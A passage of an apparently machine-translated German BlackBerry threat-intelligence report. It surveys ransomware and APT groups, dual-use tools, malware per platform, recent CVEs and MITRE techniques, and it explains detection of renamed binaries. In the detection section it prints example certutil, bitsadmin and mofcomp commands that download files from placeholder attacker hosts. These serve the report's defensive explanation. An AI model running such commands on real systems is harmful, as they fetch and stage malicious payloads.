Im Februar haben die nationale Wettbewerbsbehörde (NCA), das FBI und Europol im Rahmen einer koordinierten globalen Aktion namens "Operation Cronosmit Strafverfolgungsbehörden in 10 Ländern zusammengearbeitet, um die Kontrolle über die Infrastruktur und die Leak-Site der LockBit-Gruppe zu übernehmen, Informationen von deren Servern zu sammeln, Verhaftungen vorzunehmen und Sanktionen zu verhängen.

Weniger als eine Woche später gruppierte sich die Ransomware-Gruppe jedoch neu und nahm ihre Angriffe wieder auf, wobei sie aktualisierte Verschlüsselungsprogramme und Erpresserbriefe verwendete, die die Opfer nach der Unterbrechung durch die Strafverfolgungsbehörden an neue Server verwiesen.

LockBit hat sich zu Cyberangriffen auf verschiedene Netzwerke bekannt, darunter auch das Krankenhausnetzwerk von Capital Health. In beiden Fällen drohten sie mit der Herausgabe vertraulicher Daten, falls nicht umgehend Lösegeld gezahlt würde.

Rhysida

Rhysida ist eine relativ neue RaaS-Gruppe, die erstmals gegen Ende Mai 2023 beobachtet wurde. Obwohl die Gruppe erst vor kurzem aufgetaucht ist, hat sie sich schnell als eine ernstzunehmende Ransomware-Bedrohung etabliert. Ihr erster öffentlichkeitswirksamer Angriff galt der chilenischen Armee und markierte den Beginn eines Anstiegs von Ransomware-Angriffen auf lateinamerikanische Regierungseinrichtungen.
Die Rhysida-Gruppe griff auch den Yachthändler MarineMax an. Die Rhysida-Gruppe hat eine begrenzte Menge an Daten aus ihrer Umgebung exfiltriert, darunter Kunden- und Mitarbeiterinformationen, einschließlich personenbezogener Daten, die für Identitätsdiebstahl verwendet werden können. Diese gestohlenen Daten werden nun im Dark Web für 15 BTC zum Verkauf angeboten - zum Zeitpunkt der Erstellung dieses Artikels etwa 1.013.556 US-Dollar. Darüber hinaus veröffentlichte Rhysida auf seiner Dark-Web-Leak-Site Screenshots, die angeblich die Finanzunterlagen von MarineMax sowie Bilder von Führerscheinen und Pässen der Mitarbeiter zeigen.

APT29

APT29, auch bekannt als Cozy Bear, Midnight Blizzard oder NOBELIUM, ist eine Bedrohungsgruppe, die dem russischen Auslandsgeheimdienst (SVR) zugeschrieben wird. APT29 ist dafür bekannt, Regierungen, politische und Forschungsorganisationen sowie kritische Infrastrukturen ins Visier zu nehmen.

Die CISA warnte kürzlich, dass APT29 seine Angriffe auf weitere Branchen und mehr lokale Behörden ausgeweitet hat. Die Bedrohungsgruppe, die dafür bekannt ist, dass sie eine breite Palette an benutzerdefinierter Malware einsetzt, hat in letzter Zeit auch Cloud-Dienste ins Visier genommen, indem sie kompromittierte Dienstkonten oder gestohlene Authentifizierungs-Tokens verwendet hat.

In diesem Berichtszeitraum wurde APT29 dabei beobachtet, wie sie sich nach einem Passwort-Spray-Angriff Zugang zu einem Microsoft-Testmieterkonto verschaffte und anschließend bösartige OAuth-Anwendungen erstellte, um auf E-Mail-Konten von Unternehmen zuzugreifen. Außerdem wurden deutsche politische Parteien mit WINELOADER angegriffen, einer Backdoor, die erstmals im Januar 2024 beobachtet wurde.

Akira

Die Ransomware Akira wurde erstmals Anfang 2023 beobachtet und hat es auf Unternehmen aller Branchen abgesehen. Durch den Zugriff auf Netzwerke mit falsch konfigurierten oder anfälligen VPN-Diensten, öffentlichem RDP, Speerphishing oder kompromittierten Anmeldeinformationen versuchen sie, Domänenkonten zu erstellen oder Anmeldeinformationen für die Ausweitung von Berechtigungen oder seitliche Bewegungen in Netzwerken zu finden.

Akira ist dafür bekannt, dass er Hilfsmittel wie diese verwendet:

  • AdFind für die Abfrage von Active Directory.
  • Mimikatz und LaZagne für den Zugang zu den Anmeldeinformationen.
  • Ngrok zum Tunneln in Netzwerke hinter Firewalls oder anderen Sicherheitsmaßnahmen.
  • AnyDesk für den Fernzugriff.
  • Erweiterter IP-Scanner zum Auffinden von Geräten in einem Netzwerk.

Von Bedrohungsakteuren verwendete Schlüsselwerkzeuge

Mimikatz

Mimikatz ist für seine Fähigkeit bekannt, sensible Anmeldedaten aus dem LSASS-Prozess (Local Security Authority Subsystem Service) auf Windows-Systemen zu extrahieren. 
Dieser Prozess dient als Aufbewahrungsort für Benutzeranmeldeinformationen nach der Anmeldung, was ihn zu einem bevorzugten Ziel für ethische Penetrationstester und böswillige Akteure gleichermaßen macht. Mimikatz ist ein beliebtes Dienstprogramm zur Bewertung der Robustheit von Windows-Netzwerken. Seriöse Penetrationstester können mit Mimikatz kritische Schwachstellen aufdecken, während böswillige Bedrohungsakteure es nutzen können, um ihre Privilegien zu erweitern oder sich seitlich in Netzwerke einzuschleichen. Bedrohungsgruppen wie LockBit und Phobos nutzen die Fähigkeiten von Mimikatz, um ausgeklügelte Cyberangriffe durchzuführen.

Kobaltstreik

Cobalt Strike, ein Rahmenwerk zur Simulation von Angreifern, simuliert die ständige Präsenz von Bedrohungsakteuren in Netzwerkumgebungen. Das Tool besteht aus zwei zentralen Komponenten: einem Agenten (Beacon) und einem Server (Team Server). Der Team Server fungiert als Langzeit-C2-Server, der im Internet gehostet wird, und steht in ständiger Kommunikation mit Beacon-Nutzlasten, die auf kompromittierten Rechnern installiert sind.
Cobalt Strike wird zwar in erster Linie von Penetrationstestern und Red Teams verwendet, um die Sicherheitslage von Netzwerken zu bewerten, wurde aber auch von Bedrohungsakteuren ausgenutzt. Der Code für Cobalt Strike 4.0 wurde Ende 2020 im Internet veröffentlicht, was dazu führte, dass eine Vielzahl von böswilligen Angreifern die Software schnell als Waffe einsetzen konnten. Die doppelte Natur von Cobalt Strike macht deutlich, wie wichtig Wachsamkeit und robuste Cybersicherheitsmaßnahmen sind, um die mit seinem Missbrauch verbundenen Risiken zu mindern und Netzwerke vor potenziellen Angriffen zu schützen.

Ngrok

Ngrok ist eine Plattform, um interne Systeme dem Internet auszusetzen. Sie bietet einen getunnelten Zugang zu einem Netzwerk oder Gerät hinter Firewalls. Nach der Einrichtung eines für das Internet sichtbaren Endpunkts wird der zu diesem Endpunkt gehende Datenverkehr über Transport Layer Security (TLS)-Tunnel an den entsprechenden Ngrok-Agenten im internen Netzwerk gesendet. Dies ermöglicht Aktivitäten wie schnelle Ad-hoc-Tests von Systemen oder Fernverwaltung.
Diese Funktionalität macht es jedoch auch zu einem attraktiven Werkzeug für Angreifer, da es einen sicheren Kanal für die Befehls- und Kontrollübernahme (C2) und Exfiltration bietet. In der Vergangenheit wurde es von Bedrohungsgruppen wie ALPHV, Lazarus und Daixin Team genutzt.

ConnectWise

ConnectWise ScreenConnect ist ein Remote-Desktop-Verwaltungstool, das vom technischen Support, von Anbietern verwalteter Dienste (MSPs) und anderen Fachleuten häufig zur Authentifizierung von Computern verwendet wird. 
Bedrohungsakteure können ScreenConnect missbrauchen, um hochwertige Endpunkte zu infiltrieren und Berechtigungen auszunutzen. ConnectWise hat kürzlich zwei wichtige Sicherheitslücken (CVE-2024-1709 und CVE-2024-1708) behoben, die es anonymen Angreifern ermöglichen könnten, einen Authentifizierungsumgehungsfehler auszunutzen und Administratorkonten auf öffentlich zugänglichen Instanzen zu erstellen.  

Vorherrschende Bedrohungen nach Plattform: Windows

Remcos

Fernzugriff-Trojaner

Remcos, die Abkürzung für Remote Control and Surveillance, ist eine Anwendung, mit der aus der Ferne auf das Gerät eines Opfers zugegriffen werden kann.

Agent Tesla

Infostealer

Agent Tesla ist ein .NET-basierter Trojaner, der häufig als MaaS verkauft wird und in erster Linie zum Sammeln von Anmeldeinformationen verwendet wird.

RedLine

Infostealer

Die RedLine-Malware nutzt eine breite Palette von Anwendungen und Diensten, um Daten der Opfer, wie Kreditkarteninformationen, Passwörter und Cookies, unrechtmäßig zu exfiltrieren.

RisePro

Infostealer

Während in unserem letzten Bericht aktualisierte Varianten von RisePro beobachtet wurden, wurde der Infostealer in diesem Berichtszeitraum in einer neuen Kampagne gesehen, die fälschlicherweise als "geknackte Software" über GitHub-Repositories verbreitet wurde.

SmokeLoader

Hintertür

SmokeLoader ist eine modulare Malware, die dazu dient, andere Nutzlasten herunterzuladen und Informationen zu stehlen. Sie wurde ursprünglich im Jahr 2011 beobachtet, bleibt aber bis heute eine aktive Bedrohung.

Prometei

Kryptowährung Miner/Botnet

Prometei ist ein mehrstufiges, plattformübergreifendes Kryptowährungs-Botnet, das hauptsächlich auf Monero-Münzen abzielt. Es kann seine Nutzlast so anpassen, dass sie entweder auf Linux- oder Windows-Plattformen abzielt. Prometei wurde zusammen mit Mimikatz eingesetzt, um sich auf so viele Endpunkte wie möglich zu verbreiten.

Buhti

Ransomware

Buhti ist eine Ransomware-Operation, die bestehende Varianten anderer Malware wie LockBit oder Babuk nutzt, um Linux- und Windows-Systeme anzugreifen.

Vorherrschende Bedrohungen nach Plattform: Linux

XMRig

Cryptocurrency Miner

XMRig ist in diesem Berichtszeitraum weiterhin weit verbreitet. Der Miner zielt auf Monero ab und ermöglicht es dem Bedrohungsakteur, das System eines Opfers zum Mining von Kryptowährungen ohne dessen Wissen zu nutzen.

NoaBot/Mirai

Verteilter Denial of Service (DDoS)

NoaBot ist eine etwas ausgefeiltere Mirai-Variante. Er verfügt über verbesserte Verschleierungstechniken im Vergleich zu Mirai und verwendet SSH zur Verbreitung anstelle von Telnet. Außerdem wird er mit uClibc anstelle von GCC kompiliert, was die Erkennung erschwert.NoaBot/Mirai

XorDDoS

DDoS

Bei XorDDoS handelt es sich um einen Trojaner, der häufig in unserer Telemetrie beobachtet wird. Er zielt auf Geräte mit Internetzugang und Linux ab und koordiniert infizierte Botnets über C2-Anweisungen. Seinen Namen verdankt er der XOR-Verschlüsselung, mit der er den Zugriff auf Ausführungs- und Kommunikationsdaten kontrolliert.

AcidPour

Wischer

Obwohl in unserer eigenen Telemetrie nicht vorhanden, wurde eine neue Version des Datenlöschers AcidPour in freier Wildbahn gesichtet. Die neueste Version der Malware, die zum Löschen von Dateien auf Routern und Modems verwendet wird, zielt speziell auf Linux-x86-Geräte ab.

Vorherrschende Bedrohungen nach Plattform: MacOS

RustDoor

Hintertür

RustDoor ist eine auf Rust basierende Backdoor-Malware, die hauptsächlich als Updates für legitime Programme getarnt verbreitet wird. Die Malware verbreitet sich als FAT-Binärdateien, die Mach-o-Dateien enthalten.

Atomarer Stehler

Infostealer

Atomic Stealer (AMOS) ist nach wie vor weit verbreitet, und eine neue Version wurde in freier Wildbahn entdeckt. Die neueste Version des Stealers enthält ein Python-Skript, das dabei hilft, unentdeckt zu bleiben. AMOS hat es auf Passwörter, Browser-Cookies, Autofill-Daten, Krypto-Brieftaschen und Mac-Schlüsselbunddaten abgesehen.

Empire-Transfer

Infostealer

Ein Infostealer, der von Moonlock Lab im Februar 2024 entdeckt wurde. Er kann sich "selbst zerstören", wenn er erkennt, dass er in einer virtuellen Umgebung ausgeführt wird. Dadurch bleibt die Malware unentdeckt und erschwert den Verteidigern die Analyse. Empire Transfer hat es auf Passwörter, Browser-Cookies und Krypto-Wallets abgesehen und verwendet eine ähnliche Taktik wie Atomic Stealer (AMOS).

Vorherrschende Bedrohungen nach Plattform: Android

SpyNote

Infostealer/RAT

SpyNote nutzt den Android Accessibility Service, um Benutzerdaten zu erfassen und die erfassten Daten an einen C2-Server zu senden.

Anatsa/Teabot

Infostealer

Wird in erster Linie über den Google Play Store als Trojaner-Anwendung verbreitet. Nach der Erstinfektion durch die Trojaner-Anwendung lädt Anatsa zusätzliche bösartige Dateien von einem C2-Server auf das Gerät des Opfers herunter.

Vultur

Infostealer/RAT

Vultur wurde erstmals im Jahr 2021 entdeckt und über Trojaner-Anwendungen und Social-Engineering-Techniken wie "Smishing" (SMS-Phishing) verbreitet. Neben der Datenexfiltration kann ein Bedrohungsakteur auch Änderungen am Dateisystem vornehmen, Ausführungsberechtigungen modifizieren und das infizierte Gerät über Android Accessibility Services steuern.

Coper/Octo

Infostealer/RAT

Eine Variante der Exobot-Familie. Sie wird als MaaS-Produkt angeboten und verfügt über Funktionen wie Keylogging, SMS-Überwachung, Bildschirmkontrolle, Fernzugriff und C2-Betrieb.

Allgemeine Schwachstellen und Gefährdungen

Die CVEs (Common Vulnerabilities and Exposures - Gemeinsame Schwachstellen und Gefährdungen) bieten einen Rahmen für die Identifizierung, Standardisierung und Veröffentlichung bekannter Sicherheitsschwachstellen und Gefährdungen. Wie bereits erwähnt, nutzen Cyber-Kriminelle CVEs zunehmend, um in Systeme einzudringen und Daten zu stehlen. In diesem Berichtszeitraum wurden neue Schwachstellen in den Produkten von Ivanti, ConnectWise, Fortra und Jenkins gefunden, die böswilligen Tätern neue Möglichkeiten bieten, Opfer anzugreifen. Darüber hinaus haben die letzten Monate die Risiken von Angriffen auf die Lieferkette aufgezeigt, die in Open-Source-Projekten mit der XZ-Backdoor vorhanden sein könnten, die absichtlich in XZ Utils, einem Datenkomprimierungsprogramm, das auf fast allen Linux-Installationen verfügbar ist, eingeschleust wurde.

Von Januar bis März wurden vom National Institute of Standards and Technology (NIST) fast 8.900 neue CVEs gemeldet. Die Basisbewertung setzt sich aus sorgfältig berechneten Metriken zusammen, die zur Berechnung eines Schweregrads von null bis 10 verwendet werden können. Die vorherrschende CVE-Basisbewertung war eine 7", die 26 Prozent der Gesamtbewertung ausmachte. Dies ist ein Anstieg von drei Prozent für diese CVE-Bewertung im Vergleich zum letzten Berichtszeitraum. Der März hält in diesem Jahr den Rekord für die meisten neu entdeckten CVEs, mit fast 3.350 neuen CVEs. Die Tabelle "Trending CVEs" bezieht sich auf bestimmte Schwachstellen, die in der NIST National Vulnerability Database aufgeführt sind.

Abbildung 12: Aufschlüsselung des CVE-Schweregrads.

Aktuelle CVEs

XZ Utils Backdoor

CVE-2024-3094 (10 kritisch)
Unbefugter Zugriff

Dieser bösartige Code war in XZ Utils Version 5.6.0 und 5.6.1 eingebettet. Die Backdoor manipulierte sshd, wodurch nicht authentifizierte Angreifer unberechtigten Zugriff auf die betroffenen Linux-Distributionen erhielten.
 

Ivanti Zero-Day-Schwachstellen

CVE-2024-21887 (9.1 Kritisch); CVE-2023-46805 (8.2 Hoch); CVE-2024-21888 (8.8 Hoch); CVE-2024-21893 (8.2 Hoch)
Willkürliche Code-Ausführung

Anfang dieses Jahres wurden in den Produkten Ivanti Connect Secure (9.x, 22.x) und Ivanti Policy Secure (9.x, 22.x) Schwachstellen bei der Umgehung der Authentifizierung und der Befehlsinjektion gefunden. Wenn beide Produkte von einem Angreifer zusammen verwendet werden, können sie bösartige Anfragen erstellen und beliebige Befehle auf dem System ausführen.

Im Januar warnte Ivanti außerdem vor zwei weiteren Schwachstellen, die die Produkte betreffen: CVE-2024-21888 (eine Schwachstelle für die Ausweitung von Berechtigungen) und CVE-2024-21893 (eine Schwachstelle für die serverseitige Fälschung von Anfragen). Staatliche Akteure haben diese Zero-Day-Schwachstellen ausgenutzt, um benutzerdefinierte Malware-Stämme zu installieren.
 

Umgehung des Windows-SmartScreen

CVE-2024-21412 (8.1 Hoch)
Sicherheitsumgehung

Es handelt sich um eine Umgehung der Sicherheitsfunktion für Internet-Verknüpfungsdateien, die Microsoft Windows Internet-Verknüpfungsdateien betrifft. Er erfordert eine Benutzerinteraktion, um die Sicherheitsüberprüfungen zu umgehen. Nach der ersten Interaktion wird eine Reihe von Ausführen veranlasst, die das Opfer schließlich zu einem bösartigen Skript führen. Diese Zero-Day-Schwachstelle wurde von einer Bedrohungsgruppe zur Verbreitung des DarkMe RAT genutzt.

Windows-Kernel-Erweiterungsschwachstelle

CVE-2024-21338 (7.8 Hoch)
Erhöhung von Privilegien

Durch das Ausnutzen dieser Sicherheitslücke kann der Angreifer Systemprivilegien erlangen. Die Lazarus Group (eine nordkoreanische Bedrohungsgruppe) nutzte diese Zero-Day-Schwachstelle im Windows AppLocker-Treiber (appid.sys) aus, um Zugriff auf die Kernel-Ebene zu erhalten.

Fortra's GoAnywhere MFT Sicherheitslücke

CVE-2024-0204 (9.8 Kritisch)
Umgehung der Authentifizierung

Im Januar veröffentlichte Fortra einen Sicherheitshinweis, in dem die kritische Umgehung eines GoAnywhere MFT-Produkts beschrieben wurde. Diese Schwachstelle wurde in GoAnywhere MFT von Fortra vor Version 7.4.1 gefunden. Durch die Ausnutzung der Schwachstelle kann ein unbefugter Benutzer über das Administrationsportal einen Admin-Benutzer erstellen.

Jenkins Sicherheitslücke beim Lesen beliebiger Dateien

CVE-2024-23897 (9.7 Kritisch)
Entfernte Code-Ausführung

Frühere Versionen von Jenkins - bis 2.441 und früher, LTS 2.426.2 - enthalten eine Sicherheitslücke, die im Dateisystem des Jenkins-Controllers über die integrierte Befehlszeilenschnittstelle gefunden wurde. Sie wird in der args4j-Bibliothek gefunden, die eine Funktion hat, die ein "@"-Zeichen, gefolgt von einem Dateipfad in einem Argument, durch den Inhalt der Datei ersetzt.34 Dies wiederum ermöglicht es einem Angreifer, beliebige Dateien auf dem Dateisystem zu lesen, was möglicherweise zu einer entfernten Codeausführung führen kann.

ConnectWise ScreenConnect 23.9.7 Sicherheitslücke

CVE-2024-1709 (10 kritisch); CVE-2024-1708 (8.4 hoch)
Entfernte Code-Ausführung

Diese Sicherheitslücke betrifft das ConnectWise ScreenConnect 23.9.7 Produkt. Es wurde beobachtet, dass Angreifer diese beiden Sicherheitslücken in freier Wildbahn ausnutzen. Beide arbeiten in Verbindung miteinander, wobei CVE-2024-1709 (eine kritische Authentifizierungsumgehungsschwachstelle) es dem Angreifer ermöglicht, administrative Konten zu erstellen und CVE-2024-1708 (eine Pfadumgehungsschwachstelle) auszunutzen, was einen nicht autorisierten Zugriff auf die Dateien und Verzeichnisse des Opfers ermöglicht.

Gemeinsame MITRE-Techniken

Das Verständnis der hochrangigen Techniken von Bedrohungsgruppen kann bei der Entscheidung helfen, welche Erkennungstechniken vorrangig eingesetzt werden sollten. BlackBerry beobachtete die folgenden Top-20-Techniken, die von Bedrohungsakteuren in diesem Berichtszeitraum eingesetzt wurden.

Ein Pfeil nach oben in der letzten Spalte zeigt an, dass die Nutzung der Technik seit unserem letzten Bericht zugenommen hat; ein Pfeil nach unten bedeutet, dass die Nutzung zurückgegangen ist, und ein Gleichheitszeichen (=) bedeutet, dass die Technik an der gleichen Stelle wie in unserem letzten Bericht bleibt.

Technik Name Technik-ID Taktik Name Letzter Bericht Ändern Sie
Prozess Injektion
T1055
Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
1
=
Suche nach Systeminformationen
T1082
Entdeckung
3
DLL-Seiten-Laden
T1574.002
Persistenz, Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
4
Eingabe-Erfassung
T1056
Zugangsberechtigung, Sammlung
2
Entdeckung von Sicherheitssoftware
T1518.001
Entdeckung
NA
Maskerade
T1036
Verteidigung Umgehung
10
Suche nach Dateien und Verzeichnissen
T1083
Entdeckung
13
Prozess Entdeckung
T1057
Entdeckung
19
Protokoll der Anwendungsschicht
T1071
Befehl und Kontrolle
6
Registry Run Keys/Startup Folder
T1547.001
Persistenz, Privilegieneskalation
9
Nicht-Anwendungsschicht-Protokoll
T1095
Befehl und Kontrolle
5
Fernerkundung von Systemen
T1018
Entdeckung
15
Anwendungsfenster Entdeckung
T1010
Entdeckung
NA
Software-Paketierung
T1027.002
Verteidigung Umgehung
NA
Geplanter Task/Job
T1053
Ausführung, Persistenz, Privilegieneskalation
8
Windows-Dienst
T1543.003
Persistenz, Privilegieneskalation
12
Deaktivieren oder Ändern von Tools
T1562.001
Verteidigung Umgehung
18
Interpreter für Befehle und Skripte
T1059
Ausführung
7
Verdeckte Dateien oder Informationen
T1027
Verteidigung Umgehung
NA
Replikation über Wechseldatenträger
T1091
Erster Zugang, seitliche Bewegung
11
Technik-ID
Prozess Injektion
T1055
Suche nach Systeminformationen
T1082
DLL-Seiten-Laden
T1574.002
Eingabe-Erfassung
T1056
Entdeckung von Sicherheitssoftware
T1518.001
Maskerade
T1036
Suche nach Dateien und Verzeichnissen
T1083
Prozess Entdeckung
T1057
Protokoll der Anwendungsschicht
T1071
Registry Run Keys/Startup Folder
T1547.001
Nicht-Anwendungsschicht-Protokoll
T1095
Fernerkundung von Systemen
T1018
Anwendungsfenster Entdeckung
T1010
Software-Paketierung
T1027.002
Geplanter Task/Job
T1053
Windows-Dienst
T1543.003
Deaktivieren oder Ändern von Tools
T1562.001
Interpreter für Befehle und Skripte
T1059
Verdeckte Dateien oder Informationen
T1027
Replikation über Wechseldatenträger
T1091
Taktik Name
Prozess Injektion
Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
Suche nach Systeminformationen
Entdeckung
DLL-Seiten-Laden
Persistenz, Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
Eingabe-Erfassung
Zugangsberechtigung, Sammlung
Entdeckung von Sicherheitssoftware
Entdeckung
Maskerade
Verteidigung Umgehung
Suche nach Dateien und Verzeichnissen
Entdeckung
Prozess Entdeckung
Entdeckung
Protokoll der Anwendungsschicht
Befehl und Kontrolle
Registry Run Keys/Startup Folder
Persistenz, Privilegieneskalation
Nicht-Anwendungsschicht-Protokoll
Befehl und Kontrolle
Fernerkundung von Systemen
Entdeckung
Anwendungsfenster Entdeckung
Entdeckung
Software-Paketierung
Verteidigung Umgehung
Geplanter Task/Job
Ausführung, Persistenz, Privilegieneskalation
Windows-Dienst
Persistenz, Privilegieneskalation
Deaktivieren oder Ändern von Tools
Verteidigung Umgehung
Interpreter für Befehle und Skripte
Ausführung
Verdeckte Dateien oder Informationen
Verteidigung Umgehung
Replikation über Wechseldatenträger
Erster Zugang, seitliche Bewegung
Letzter Bericht
Prozess Injektion
1
Suche nach Systeminformationen
3
DLL-Seiten-Laden
4
Eingabe-Erfassung
2
Entdeckung von Sicherheitssoftware
NA
Maskerade
10
Suche nach Dateien und Verzeichnissen
13
Prozess Entdeckung
19
Protokoll der Anwendungsschicht
6
Registry Run Keys/Startup Folder
9
Nicht-Anwendungsschicht-Protokoll
5
Fernerkundung von Systemen
15
Anwendungsfenster Entdeckung
NA
Software-Paketierung
NA
Geplanter Task/Job
8
Windows-Dienst
12
Deaktivieren oder Ändern von Tools
18
Interpreter für Befehle und Skripte
7
Verdeckte Dateien oder Informationen
NA
Replikation über Wechseldatenträger
11
Ändern Sie
Prozess Injektion
=
Suche nach Systeminformationen
DLL-Seiten-Laden
Eingabe-Erfassung
Entdeckung von Sicherheitssoftware
Maskerade
Suche nach Dateien und Verzeichnissen
Prozess Entdeckung
Protokoll der Anwendungsschicht
Registry Run Keys/Startup Folder
Nicht-Anwendungsschicht-Protokoll
Fernerkundung von Systemen
Anwendungsfenster Entdeckung
Software-Paketierung
Geplanter Task/Job
Windows-Dienst
Deaktivieren oder Ändern von Tools
Interpreter für Befehle und Skripte
Verdeckte Dateien oder Informationen
Replikation über Wechseldatenträger

Mithilfe von MITRE D3FEND™hat das Team von BlackBerry Threat Research and Intelligence eine vollständige Liste von Gegenmaßnahmen für die in diesem Berichtszeitraum beobachteten Techniken erstellt, die in unserem öffentlichen GitHub verfügbar ist.

Die drei wichtigsten Techniken sind bekannte Verfahren, die von Angreifern verwendet werden, um Schlüsselinformationen für erfolgreiche Angriffe zu sammeln. Der Abschnitt Angewandte Gegenmaßnahmen enthält einige Beispiele für ihre Verwendung und einige nützliche Informationen zur Überwachung.

Die Auswirkungen der Gesamtheit der Techniken und Taktiken sind in der nachstehenden Grafik zu sehen:

Abbildung 13: Beobachtete MITRE ATT&CK®-Techniken.

Die am weitesten verbreitete Taktik in diesem Berichtszeitraum ist die Umgehung von Verteidigungsmaßnahmen, die 24 Prozent aller in diesem Zeitraum beobachteten Taktiken ausmacht, gefolgt von Discovery mit 23 Prozent und Privilege Escalation mit 21 Prozent.
Abbildung 14: Beobachtete MITRE ATT&CK-Taktiken.

Angewandte Gegenmaßnahmen für notierte MITRE-Techniken

Das BlackBerry Research and Intelligence Team analysierte fünf bekannte MITRE-Techniken, die in diesem Berichtszeitraum beobachtet wurden:

CylanceMDR Daten

In diesem Abschnitt des Berichts werden einige der häufigsten Bedrohungserkennungen hervorgehoben, die in Kundenumgebungen von CylanceMDR beobachtet wurden.

CylanceMDR, früher bekannt als CylanceGUARD®, ist ein abonnementbasierter Managed Detection and Response (MDR)-Service von BlackBerry , der eine 24x7-Überwachung bietet und Unternehmen dabei hilft, ausgeklügelte Cyberbedrohungen zu stoppen, die Lücken in den Sicherheitsprogrammen der Kunden ausnutzen. Das Team von CylanceMDR verfolgte in diesem Berichtszeitraum Tausende von Warnmeldungen. Im Folgenden werden die Telemetriedaten nach Regionen aufgeschlüsselt, um einen zusätzlichen Einblick in die aktuelle Bedrohungslandschaft zu geben.

Abbildung 15: Die fünf wichtigsten Ausschreibungen nach Region.

CylanceMDR Beobachtungen

In diesem Berichtszeitraum stellte das Team von CylanceMDR fest, dass Certutil für viele Erkennungsaktivitäten innerhalb des Security Operations Center (SOC) verantwortlich war, und zwar die Technik im Zusammenhang mit der Umbenennung von Tools wie Certutil (z. B.: "Mögliche Certutil-Umbenennung"). In allen geografischen Regionen, in denen BlackBerry Kunden schützt, kam es zu einer Häufung von Entdeckungen in diesem Zusammenhang.

In unserem letzten Bericht haben wir erörtert, wie LOLBAS-Dienstprogramme (Living-off-the-land binaries and scripts) wie Certutil von Bedrohungsakteuren missbraucht werden: Sie benennen oft legitime Dienstprogramme (wie Certutil) um, um die Erkennungsfunktionen zu umgehen. Dies wird als masquerading bezeichnet und hat die MITRE Technique ID: T1036.003. Verteidiger müssen robuste Erkennungsfunktionen einsetzen, um das Risiko von Umgehungstechniken wie dem Masquerading zu minimieren. So kann beispielsweise eine Erkennungsregel, die nur ausgelöst wird, wenn sie den Befehl Certutil (zusammen mit allen Optionen/Argumenten, die mit diesem Tool missbraucht werden) sieht, leicht umgangen werden.

Nehmen Sie zum Beispiel die beiden folgenden Befehle:
certutil.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt

Wenn sich Ihre Erkennungsfunktionen nur darauf verlassen, dass der Befehl
certutil (zusammen mit seinen Optionen) erkannt wird, wird dies zwar erkannt, aber als schwacher Schutz betrachtet, da er leicht umgangen werden kann.
outlook.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt

In diesem Fall haben wir certutil.exe in outlook.exe umbenannt, und dies würde die Erkennung vollständig umgehen (wenn die oben beschriebene Logik verwendet wird).

Eine bessere Lösung wäre es, dafür zu sorgen, dass die PE-Metadaten (portable executable file/process), wie z. B. der ursprüngliche Dateiname (der interne Dateiname, der bei der Kompilierung angegeben wurde), erfasst und in die Erkennungsfunktionen integriert werden. Eine Nichtübereinstimmung zwischen dem Dateinamen auf der Festplatte und den PE-Metadaten der Binärdatei ist ein guter Indikator dafür, dass eine Binärdatei nach der Kompilierung umbenannt wurde.

LOLBAS Aktivität

In diesem Berichtszeitraum haben wir eine Veränderung der LOLBAS-Aktivitäten bei unseren Kunden festgestellt:

  • Zunahme der Entdeckungen im Zusammenhang mit regsvr32.exe.
  • Rückgang der mshta.exe-bezogenen Aktivität.
  • Starke Zunahme der Erkennungen im Zusammenhang mit bitsadmin.exe.
Abbildung 16: LOLBAS erkannt von CylanceMDR.


Nachstehend ein Beispiel für die böswillige Nutzung von LOLBAS (mit Ausnahme derjenigen, die im letzten Berichtszeitraum freigegeben wurden).

Datei: Bitsadmin.exe
Mitre: T1197 | T1105
Wie es missbraucht werden kann: 

  • Herunter-/Hochladen von oder auf einen bösartigen Host (Übertragung von Ingress-Tools)
  • Kann zur Ausführung bösartiger Prozesse verwendet werden

Example Command:
bitsadmin /transfer defaultjob1 /download hxxp://baddomain[.]com/bbtest/bbtest C:\Users\<user>\AppData\Local\Temp\bbtest


Datei: mofcomp.exe
Mitre: T1218
Wie es missbraucht werden kann: 

  • Kann verwendet werden, um bösartige MOF-Skripte (Managed Object Format) zu installieren
  • MOF-Anweisungen werden vom Dienstprogramm mofcomp.exe geparst und fügen die in der Datei definierten Klassen und Klasseninstanzen dem WMI-Repository hinzu

Example Command:
mofcomp.exe \\<AttackkerIP>\content\BBwmi[.]mof

Tools für die Fernüberwachung und -verwaltung (Remote Monitoring and Management, RMM) werden häufig von Managed IT Service Providern (MSPs) eingesetzt, um die Endgeräte ihrer Kunden aus der Ferne zu überwachen. Leider ermöglichen RMM-Tools auch Bedrohungsakteuren den Zugriff auf dieselben Systeme. Diese Tools bieten eine Reihe von Verwaltungsfunktionen und ermöglichen es den Bedrohungsakteuren, sich durch die Verwendung vertrauenswürdiger und zugelassener Tools zu tarnen.

Im Jahr 2023 stand der Missbrauch von RMM-Tools aufgrund von Berichten über Scattered Spider im Mittelpunkt, einer Cyberangriffsgruppe, die hinter den Angriffen auf MGM Resorts International im September 2023 vermutet wird. Die Mitglieder von Scattered Spider gelten als erfahrene Social-Engineering-Experten und setzen verschiedene Techniken wie SIM-Swap-Angriffe, Phishing und Push-Bombing ein. Bei ihren Angriffen haben sie eine Reihe von RMM-Tools eingesetzt, wie z. B.:

  • Splashtop
  • TeamViewer
  • ScreenConnect

Seit der Entdeckung von zwei Sicherheitslücken in ConnectWise ScreenConnect (alle Versionen unter 23.9.8) im ersten Berichtszeitraum des Jahres 2024 ist die Aufmerksamkeit für RMM-Tools unverändert hoch. Die CVE-Details finden Sie unten:

CVE-2024-1709

CWE-288: Umgehung der Authentifizierung über einen alternativen Pfad oder Kanal.

CVE-2024-1708

CWE-22: Unzulässige Beschränkung eines Pfadnamens auf ein eingeschränktes Verzeichnis ("path traversal").

Das nachstehende Schaubild veranschaulicht die in diesem Berichtszeitraum am häufigsten beobachteten RMM-Tools.

Abbildung 17: RMM-Tools, die auf CylanceMDR zu finden sind.


Bei unserer Analyse haben wir festgestellt, dass viele Kunden mehrere RMM-Tools verwenden, was die Angriffsfläche und das Risiko für das Unternehmen erhöht. Zu den vorgeschlagenen Abhilfemaßnahmen gehören:

Audit von Fernzugriffs-Tools (RMM-Tools)

